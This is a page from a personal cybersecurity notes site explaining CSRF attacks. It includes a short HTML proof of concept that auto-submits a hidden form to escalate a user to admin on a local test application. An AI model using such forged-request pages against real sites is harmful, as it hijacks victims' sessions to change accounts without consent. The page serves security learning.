Cyber Security Notes

CSRF Attacks

Cyber Security Notes

Index
Attacking Web Applications
Attacking Web Applications
Binary Exploitation
Binary Exploitation
- How to use GDB
Cryptography
Cryptography
- Pretty Good Privacy (PGP)
- Asymmetric Encryption
  Asymmetric Encryption
  - RSA
    RSA
    
    RSA Attacks
    
    RSA Basics
- Symetric Encryption
  Symetric Encryption
  - AES
    AES
    
    AES Basics
General Pentesting
General Pentesting
- Data Exfiltration
- Miscellaneous Tools
- Miscellaneous Services
- Pivoting
- Port Scanning
- Password Attacks
  Password Attacks
  - Offline Password Attacks
  - Online Password Attacks
Miscellaneous
Miscellaneous
- Machine Learning & AI Attacks
  Machine Learning & AI Attacks
  - Creating Malicious Tensorflow Models
Pentesting Linux
Pentesting Linux
- Priviliage Escalation
- Linux - Stabilisation & Post Exploitation
Pentesting Windows
Pentesting Windows
- Creating Robust Reverse Shells
- Enumerating Windows
- Network Enumeration
- Windows - Stabilisation & Post Exploitation
- Windows Commands
- Windows Local Persistence
- Windows Privilage Escalation
- Windows Tools
- Active Directory
  Active Directory
  - Enumerating Users
  - Hashes & Tokens
    Hashes & Tokens
    
    ASREPRoasting
    
    Dumping Hashes
  - Post Exploitation
    Post Exploitation
    
    Enumaration of Active Directory
  - Remote Management
    Remote Management
    
    evil-winrm
- Windows Services
  Windows Services
  - Pentesting MS-SQL
  - SMB Protocol
Reverse Engineering & Forensics
Reverse Engineering & Forensics
- Memory Analysis
  Memory Analysis
- Reversing Python
  Reversing Python
  - Decompile .elf & .exe Binaries.md

CSRF Attacks¶

CSRF (Cross-Site Request Forgery) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.

Here's a simple example of a CSRF attack:

<html>
  <body>
    <form action="http://127.0.0.1:1337/admin/escalateUserToAdmin" method="post">
      <input type="text" name="username" value="sarp" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

This simple HTML page will automatically submit a form to escalate a user to an admin. If the user is authenticated to the application, the request will be sent with the user's session cookie, and the user will be escalated to an admin.